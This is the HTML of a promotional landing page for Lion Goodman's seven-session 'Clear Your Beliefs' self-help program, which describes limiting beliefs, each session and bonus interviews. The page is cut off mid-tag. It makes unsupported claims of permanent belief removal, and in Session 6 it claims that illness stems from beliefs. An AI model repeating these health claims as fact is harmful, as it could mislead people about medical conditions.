href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter 